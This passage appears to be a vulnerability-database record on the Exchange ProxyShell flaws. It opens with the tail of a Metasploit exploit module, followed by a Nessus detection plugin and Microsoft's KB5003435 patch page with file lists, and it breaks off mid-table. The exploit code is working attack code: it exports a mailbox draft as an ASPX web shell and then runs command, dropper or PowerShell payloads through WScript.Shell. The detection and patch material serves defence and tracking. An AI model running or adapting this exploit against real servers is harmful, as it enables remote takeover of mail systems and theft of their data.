unc_path.gsub(/^\\\\+[\\w.-]+\\\\(.)\\$\\\\/, '\\1:\\\\')\n print_status(\"Writing to: #{normal_path}\")\n register_file_for_cleanup(normal_path)\n\n @export_name = rand_text_alphanumeric(8..12)\n successful = execute_powershell('New-MailboxExportRequest', cat: @common_access_token, args: [\n { name: '-Name', value: @export_name },\n { name: '-Mailbox', value: @mailbox_user_email },\n { name: '-IncludeFolders', value: '#Drafts#' },\n { name: '-ContentFilter', value: \"(Subject -eq '#{@draft_subject}')\" },\n { name: '-ExcludeDumpster' },\n { name: '-FilePath', value: unc_path }\n ])\n fail_with(Failure::UnexpectedReply, 'The mailbox export request failed') unless successful\n\n exported = false\n print_status('Waiting for the export request to complete...')\n 30.times do\n sleep 5\n next unless send_request_cgi('uri' => normalize_uri(web_directory, @shell_filename))&.code == 200\n\n print_good('The mailbox export request has completed')\n exported = true\n break\n end\n\n fail_with(Failure::Unknown, 'The mailbox export request timed out') unless exported\n\n print_status('Triggering the payload')\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n if !cmd_windows_generic?\n execute_command(payload.encoded)\n else\n boundary = rand_text_alphanumeric(8..12)\n response = execute_command(\"cmd /c echo START#{boundary}&#{payload.encoded}&echo END#{boundary}\")\n\n print_warning('Dumping command output in response')\n if response.body =~ /START#{boundary}(.*)END#{boundary}/m\n print_line(Regexp.last_match(1).strip)\n else\n print_error('Empty response, no command output')\n end\n end\n when :windows_dropper\n execute_command(generate_cmdstager(concat_operator: ';').join)\n when :windows_powershell\n cmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)\n execute_command(cmd)\n end\n end\n\n def cleanup\n super\n return unless @common_access_token && @export_name\n\n print_status('Removing the mailbox export request')\n execute_powershell('Remove-MailboxExportRequest', cat: @common_access_token, args: [\n { name: '-Identity', value: \"#{@mailbox_user_email}\\\\#{@export_name}\" },\n { name: '-Confirm', value: false }\n ])\n\n print_status('Removing the draft email')\n execute_powershell('Search-Mailbox', cat: @common_access_token, args: [\n { name: '-Identity', value: @mailbox_user_email },\n { name: '-SearchQuery', value: \"Subject:\\\"#{@draft_subject}\\\"\" },\n { name: '-Force' },\n { name: '-DeleteContent' }\n ])\n end\n\n def execute_command(cmd, _opts = {})\n if !cmd_windows_generic?\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\"));\"\n else\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\"\n end\n\n send_request_raw(\n 'method' => 'POST',\n 'uri' => normalize_uri(web_directory, @shell_filename),\n 'ctype' => 'application/x-www-form-urlencoded',\n 'data' => \"#{@shell_input_name}=#{cmd}\"\n )\n end\nend\n\n# Use https://learn.microsoft.com/en-us/exchange/client-developer/web-service-reference/resolvenames to resolve mailbox\n# information. The endpoint only returns 100 at a time though so if the target has more than that many email addresses\n# multiple requests will need to be made. Since the endpoint doesn't support pagination, we refine the query by using\n# progressively larger search prefixes until there are less than 101 results and thus will fit into a single response.\nclass MailboxEnumerator\n def initialize(mod)\n @mod = mod\n end\n\n # the characters that Exchange Server 2019 allows in an alias (no unicode)\n ALIAS_CHARSET = 'abcdefghijklmnopqrstuvwxyz0123456789!#$%&\\'*+-/=?^_`{|}~'.freeze\n XML_NS = {\n 'm' => 'http://schemas.microsoft.com/exchange/services/2006/messages',\n 't' => 'http://schemas.microsoft.com/exchange/services/2006/types'\n }.freeze\n\n include Enumerable\n XMLTemplate = Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell::XMLTemplate\n\n def each(name: 'SMTP:', &block)\n envelope = XMLTemplate.render('soap_getemails', name: name)\n res = @mod.send_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8')\n return unless res&.code == 200\n\n if res.get_xml_document.xpath('//m:ResolutionSet/@IncludesLastItemInRange', XML_NS).first&.text&.downcase == 'false'\n ALIAS_CHARSET.each_char do |char|\n each(name: name + char, &block)\n end\n else\n res.get_xml_document.xpath('//t:Mailbox', XML_NS).each do |mailbox|\n yield %w[t:EmailAddress t:Name t:RoutingType t:MailboxType].map { |xpath| mailbox.xpath(xpath, XML_NS)&.text || '' }\n end\n end\n end\nend\n\nclass PstEncoding\n ENCODE_TABLE = [\n 71, 241, 180, 230, 11, 106, 114, 72,\n 133, 78, 158, 235, 226, 248, 148, 83,\n 224, 187, 160, 2, 232, 90, 9, 171,\n 219, 227, 186, 198, 124, 195, 16, 221,\n 57, 5, 150, 48, 245, 55, 96, 130,\n 140, 201, 19, 74, 107, 29, 243, 251,\n 143, 38, 151, 202, 145, 23, 1, 196,\n 50, 45, 110, 49, 149, 255, 217, 35,\n 209, 0, 94, 121, 220, 68, 59, 26,\n 40, 197, 97, 87, 32, 144, 61, 131,\n 185, 67, 190, 103, 210, 70, 66, 118,\n 192, 109, 91, 126, 178, 15, 22, 41,\n 60, 169, 3, 84, 13, 218, 93, 223,\n 246, 183, 199, 98, 205, 141, 6, 211,\n 105, 92, 134, 214, 20, 247, 165, 102,\n 117, 172, 177, 233, 69, 33, 112, 12,\n 135, 159, 116, 164, 34, 76, 111, 191,\n 31, 86, 170, 46, 179, 120, 51, 80,\n 176, 163, 146, 188, 207, 25, 28, 167,\n 99, 203, 30, 77, 62, 75, 27, 155,\n 79, 231, 240, 238, 173, 58, 181, 89,\n 4, 234, 64, 85, 37, 81, 229, 122,\n 137, 56, 104, 82, 123, 252, 39, 174,\n 215, 189, 250, 7, 244, 204, 142, 95,\n 239, 53, 156, 132, 43, 21, 213, 119,\n 52, 73, 182, 18, 10, 127, 113, 136,\n 253, 157, 24, 65, 125, 147, 216, 88,\n 44, 206, 254, 36, 175, 222, 184, 54,\n 200, 161, 128, 166, 153, 152, 168, 47,\n 14, 129, 101, 115, 228, 194, 162, 138,\n 212, 225, 17, 208, 8, 139, 42, 242,\n 237, 154, 100, 63, 193, 108, 249, 236\n ].freeze\n\n def self.encode(data)\n encoded = ''\n data.each_char do |char|\n encoded << ENCODE_TABLE[char.ord].chr\n end\n encoded\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/exchange_proxyshell_rce.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-08-03T14:37:32", "description": "The Microsoft Exchange Server installed on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-31207)\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-31195, CVE-2021-31198)\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-31209)", "cvss3": {}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Security Updates for Exchange (May 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-31195", "CVE-2021-31198", "CVE-2021-31207", "CVE-2021-31209"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS21_MAY_EXCHANGE.NASL", "href": "https://www.tenable.com/plugins/nessus/149393", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149393);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/08\");\n\n script_cve_id(\n \"CVE-2021-31195\",\n \"CVE-2021-31198\",\n \"CVE-2021-31207\",\n \"CVE-2021-31209\"\n );\n script_xref(name:\"MSKB\", value:\"5003435\");\n script_xref(name:\"MSFT\", value:\"MS21-5003435\");\n script_xref(name:\"IAVA\", value:\"2021-A-0221-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0040\");\n\n script_name(english:\"Security Updates for Exchange (May 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities:\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-31207)\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-31195,\n CVE-2021-31198)\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-31209)\");\n # https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-may-11-2021-kb5003435-028bd051-b2f1-4310-8f35-c41c9ce5a2f1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?812d3faa\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5003435 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31198\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31195\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange ProxyShell RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2013',\n 'unsupported_cu' : 22,\n 'cu' : 23,\n 'min_version': '15.00.1497.0',\n 'fixed_version': '15.00.1497.18',\n 'kb': '5003435'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 18,\n 'cu' : 19,\n 'min_version': '15.01.2176.0',\n 'fixed_version': '15.01.2176.14',\n 'kb': '5003435'\n },\n {\n 'product': '2016',\n 'unsupported_cu': 18,\n 'cu' : 20,\n 'min_version': '15.01.2242.0',\n 'fixed_version': '15.01.2242.10',\n 'kb': '5003435'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 7,\n 'cu' : 8,\n 'min_version': '15.02.792.0',\n 'fixed_version': '15.02.792.15',\n 'kb': '5003435'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 7,\n 'cu' : 9,\n 'min_version': '15.02.858.0',\n 'fixed_version': '15.02.858.12',\n 'kb': '5003435'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report\n(\n app_info:app_info,\n bulletin:'MS21-05',\n constraints:constraints,\n severity:SECURITY_WARNING\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "mskb": [{"lastseen": "2023-06-23T19:38:07", "description": "None\nThis security update rollup resolves vulnerabilities in Microsoft Exchange Server. To learn more about these vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):\n\n * [CVE-2021-31195 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-31195>)\n * [CVE-2021-31198 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-31198>)\n * [CVE-2021-31207 | Microsoft Exchange Server Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-31207>)\n * [CVE-2021-31209 | Microsoft Exchange Server Spoofing Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-31209>)\n\n## Improvements in this update\n\n * The Exchange Server version number is now added to the HTTP response reply header. You can use this information to validate the security update status of Exchange-based servers in your network.\n\n## Known issues in this update\n\n * **Issue 1** \n \nWhen you try to manually install this security update by double-clicking the update file (.msp) to run it in Normal mode (that is, not as an administrator), some files are not correctly updated.When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) might stop working. \n \nThis issue occurs on servers that are using User Account Control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services.\n\n**Note: **This issue does not occur if you install the update through Microsoft Update.\n\nTo avoid this issue, follow these steps to manually install this security update:\n 1. Select **Start**, and type **cmd**.\n 2. In the results, right-click **Command Prompt**, and then select **Run as administrator**.\n 3. If the **User Account Control** dialog box appears, verify that the default action is the action that you want, and then select **Continue**.\n 4. Type the full path of the .msp file, and then press Enter.\n * **Issue 2** \n \nExchange services might remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition might occur if the service control scripts experience a problem when they try to return Exchange services to their usual state. \n \nTo fix this issue, use Services Manager to restore the startup type to **Automatic**, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see [Start a Command Prompt as an Administrator](<https://technet.microsoft.com/en-us/library/cc947813\\(v=ws.10\\).aspx>).\n * **Issue 3** \n \nWhen you block third-party cookies in a web browser, you might be continually prompted to trust a particular add-in even though you keep selecting the option to trust it. This issue occurs also in privacy window modes (such as InPrivate mode in Microsoft Edge). This issue occurs because browser restrictions prevent the response from being recorded. To record the response and enable the add-in, you must enable third-party cookies for the domain that's hosting OWA or Office Online Server in the browser settings. To enable this setting, refer to the specific support documentation for the browser.\n * **Issue 4** \n \nWhen you try to request free/busy information for a user in a different forest in a trusted cross-forest topology, the request fails and generates a \"(400) Bad Request\" error message. For more information and workarounds to this issue, see [\"(400) Bad Request\" error during Autodiscover for per-user free/busy in a trusted cross-forest topology](<https://support.microsoft.com/help/5003623>).\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5003435>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center.\n\n * [Download Security Update For Exchange Server 2019 Cumulative Update 9 (KB5003435)](<https://www.microsoft.com/download/details.aspx?familyid=9536f4a0-838b-40a6-b625-36cd7a6229a1>)\n * [Download Security Update For Exchange Server 2019 Cumulative Update 8 (KB5003435)](<https://www.microsoft.com/download/details.aspx?familyid=0ff8a768-1dfb-4d50-acd4-87f5a1b34e5f>)\n * [Download Security Update For Exchange Server 2016 Cumulative Update 20 (KB5003435)](<https://www.microsoft.com/download/details.aspx?familyid=e8857a66-5eb5-4b0e-b938-07eb17c3af1a>)\n * [Download Security Update For Exchange Server 2016 Cumulative Update 19 (KB5003435)](<https://www.microsoft.com/download/details.aspx?familyid=68b339e9-3040-4da8-8e57-6fd325cfa9ee>)\n * [Download Security Update For Exchange Server 2013 Cumulative Update 23 (KB5003435)](<https://www.microsoft.com/download/details.aspx?familyid=91b8d31b-dcd8-4e3c-a262-8229a0d060d4>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: May 11, 2021](<https://support.microsoft.com/help/5001871>).\n\n### Security update replacement information\n\nThis security update replaces the following previously released updates:\n\n * [Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: April 13, 2021 (KB5001779)](<https://support.microsoft.com/help/5001779>)\n\n## File information\n\n### File hash information\n\nUpdate name| File name| | SHA256 hash \n---|---|---|--- \nExchange Server 2019 Cumulative Update 9| Exchange2019-KB5001779-x64-en.msp| | CB63E0BA69F7CC8E2A90DF6DA8B56BE356070DD8A7F813C17E48225BE7D0C629 \nExchange Server 2019 Cumulative Update 8| Exchange2019-KB5001779-x64-en.msp| | C4FB526397FC3FAE08A305B01E00CCAAD052B9B113BACCADED18926998CF5333 \nExchange Server 2016 Cumulative Update 20| Exchange2016-KB5001779-x64-en.msp| | F885036D62AA80B9A5CCC00AEBF38157887A4C85C74BA6640A2A875E2299B524 \nExchange Server 2016 Cumulative Update 19| Exchange2016-KB5001779-x64-en.msp| | A351E5572CDD528E90E9AE41309466F261B7CD9A0BA6715FB0E265E12FD50450 \nExchange Server 2013 Cumulative Update 23| Exchange2013-KB5001779-x64-en.msp| | 33EBE55A45B6B190410EB8F7D57FEF23246C4A75C6D52D3C176AE47D78800C68 \n \n### Exchange server file information\n\nThe English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n### \n\n__\n\nMicrosoft Exchange Server 2019 Cumulative Update 9\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.2.858.12| 71,048| 27-Apr-21| 13:23| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,518| 27-Apr-21| 13:26| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,961| 27-Apr-21| 13:25| Not applicable \nAdemodule.dll| 15.2.858.12| 106,376| 27-Apr-21| 13:25| x64 \nAirfilter.dll| 15.2.858.12| 42,896| 27-Apr-21| 13:23| x64 \nAjaxcontroltoolkit.dll| 15.2.858.12| 92,552| 27-Apr-21| 13:23| x86 \nAntispamcommon.ps1| Not applicable| 13,485| 27-Apr-21| 13:23| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 27-Apr-21| 13:29| Not applicable \nAsentirs.msi| Not applicable| 77,824| 27-Apr-21| 13:29| Not applicable \nAsentsig.msi| Not applicable| 73,728| 27-Apr-21| 13:24| Not applicable \nBigfunnel.bondtypes.dll| 15.2.858.12| 45,448| 27-Apr-21| 13:28| x86 \nBigfunnel.common.dll| 15.2.858.12| 66,440| 27-Apr-21| 13:28| x86 \nBigfunnel.configuration.dll| 15.2.858.12| 118,160| 27-Apr-21| 13:28| x86 \nBigfunnel.entropy.dll| 15.2.858.12| 44,424| 27-Apr-21| 13:28| x86 \nBigfunnel.filter.dll| 15.2.858.12| 54,160| 27-Apr-21| 13:28| x86 \nBigfunnel.indexstream.dll| 15.2.858.12| 68,984| 27-Apr-21| 13:24| x86 \nBigfunnel.neuraltree.dll| Not applicable| 694,136| 27-Apr-21| 13:29| x64 \nBigfunnel.neuraltreeranking.dll| 15.2.858.12| 19,856| 27-Apr-21| 13:28| x86 \nBigfunnel.poi.dll| 15.2.858.12| 245,112| 27-Apr-21| 13:28| x86 \nBigfunnel.postinglist.dll| 15.2.858.12| 189,320| 27-Apr-21| 13:28| x86 \nBigfunnel.query.dll| 15.2.858.12| 101,264| 27-Apr-21| 13:28| x86 \nBigfunnel.ranking.dll| 15.2.858.12| 109,432| 27-Apr-21| 13:28| x86 \nBigfunnel.syntheticdatalib.dll| 15.2.858.12| 3,634,576| 27-Apr-21| 13:24| x86 \nBigfunnel.tracing.dll| 15.2.858.12| 42,872| 27-Apr-21| 13:29| x86 \nBigfunnel.wordbreakers.dll| 15.2.858.12| 46,480| 27-Apr-21| 13:28| x86 \nCafe_airfilter_dll| 15.2.858.12| 42,896| 27-Apr-21| 13:23| x64 \nCafe_exppw_dll| 15.2.858.12| 83,344| 27-Apr-21| 13:23| x64 \nCafe_owaauth_dll| 15.2.858.12| 92,048| 27-Apr-21| 13:23| x64 \nCalcalculation.ps1| Not applicable| 42,109| 27-Apr-21| 13:26| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,602| 27-Apr-21| 13:23| Not applicable \nChksgfiles.dll| 15.2.858.12| 57,208| 27-Apr-21| 13:28| x64 \nCitsconstants.ps1| Not applicable| 15,801| 27-Apr-21| 13:23| Not applicable \nCitslibrary.ps1| Not applicable| 82,660| 27-Apr-21| 13:23| Not applicable \nCitstypes.ps1| Not applicable| 14,476| 27-Apr-21| 13:23| Not applicable \nClassificationengine_mce| 15.2.858.12| 1,693,072| 27-Apr-21| 13:23| Not applicable \nClusmsg.dll| 15.2.858.12| 134,032| 27-Apr-21| 13:23| x64 \nCoconet.dll| 15.2.858.12| 48,008| 27-Apr-21| 13:24| x64 \nCollectovermetrics.ps1| Not applicable| 81,640| 27-Apr-21| 13:23| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,878| 27-Apr-21| 13:23| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,943| 27-Apr-21| 13:24| Not applicable \nComplianceauditservice.exe| 15.2.858.12| 39,816| 27-Apr-21| 13:27| x86 \nConfigureadam.ps1| Not applicable| 22,776| 27-Apr-21| 13:25| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,340| 27-Apr-21| 13:26| Not applicable \nConfigurecryptodefaults.ps1| Not applicable| 42,051| 27-Apr-21| 13:28| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,782| 27-Apr-21| 13:25| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,840| 27-Apr-21| 13:25| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,315| 27-Apr-21| 13:26| Not applicable \nConnectfunctions.ps1| Not applicable| 37,137| 27-Apr-21| 13:29| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 30,412| 27-Apr-21| 13:29| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,244| 27-Apr-21| 13:24| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,077| 27-Apr-21| 13:25| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,544| 27-Apr-21| 13:25| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,797| 27-Apr-21| 13:25| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,924| 27-Apr-21| 13:25| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 506| 27-Apr-21| 13:23| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 506| 27-Apr-21| 13:23| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 506| 27-Apr-21| 13:23| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 506| 27-Apr-21| 13:23| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 506| 27-Apr-21| 13:23| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 506| 27-Apr-21| 13:23| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 506| 27-Apr-21| 13:23| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 506| 27-Apr-21| 13:23| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 506| 27-Apr-21| 13:23| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 506| 27-Apr-21| 13:23| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 506| 27-Apr-21| 13:23| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 506| 27-Apr-21| 13:23| Not applicable \nCts_exsmime.dll| 15.2.858.12| 380,816| 27-Apr-21| 13:29| x64 \nCts_microsoft.exchange.data.common.dll| 15.2.858.12| 1,686,912| 27-Apr-21| 13:24| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 506| 27-Apr-21| 13:23| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.2.858.12| 12,688| 27-Apr-21| 13:26| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.2.858.12| 12,688| 27-Apr-21| 13:23| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.2.858.12| 12,688| 27-Apr-21| 13:23| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.2.858.12| 12,688| 27-Apr-21| 13:23| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.2.858.12| 12,688| 27-Apr-21| 13:23| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.2.858.12| 12,688| 27-Apr-21| 13:27| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.2.858.12| 12,688| 27-Apr-21| 13:23| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.2.858.12| 12,688| 27-Apr-21| 13:23| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.2.858.12| 12,680| 27-Apr-21| 13:23| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.2.858.12| 12,664| 27-Apr-21| 13:23| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.2.858.12| 12,664| 27-Apr-21| 13:27| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.2.858.12| 12,664| 27-Apr-21| 13:23| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.2.858.12| 12,688| 27-Apr-21| 13:26| x86 \nDagcommonlibrary.ps1| Not applicable| 60,218| 27-Apr-21| 13:23| Not applicable \nDependentassemblygenerator.exe| 15.2.858.12| 22,408| 27-Apr-21| 13:29| x86 \nDiaghelper.dll| 15.2.858.12| 66,960| 27-Apr-21| 13:25| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,330| 27-Apr-21| 13:23| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,374| 27-Apr-21| 13:25| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,221| 27-Apr-21| 13:27| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,686| 27-Apr-21| 13:26| Not applicable \nDisklockerapi.dll| Not applicable| 22,416| 27-Apr-21| 13:23| x64 \nDlmigrationmodule.psm1| Not applicable| 39,612| 27-Apr-21| 13:25| Not applicable \nDsaccessperf.dll| 15.2.858.12| 45,968| 27-Apr-21| 13:24| x64 \nDscperf.dll| 15.2.858.12| 32,648| 27-Apr-21| 13:25| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.2.858.12| 1,686,912| 27-Apr-21| 13:24| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.2.858.12| 601,464| 27-Apr-21| 13:23| x86 \nEcpperfcounters.xml| Not applicable| 31,160| 27-Apr-21| 13:24| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 13:26| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.2.858.12| 12,664| 27-Apr-21| 13:27| x86 \nEdgetransport.exe| 15.2.858.12| 49,552| 27-Apr-21| 13:29| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 13:26| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 13:26| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 13:26| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 13:26| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 13:26| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 13:26| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 13:26| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 13:26| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 13:26| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not 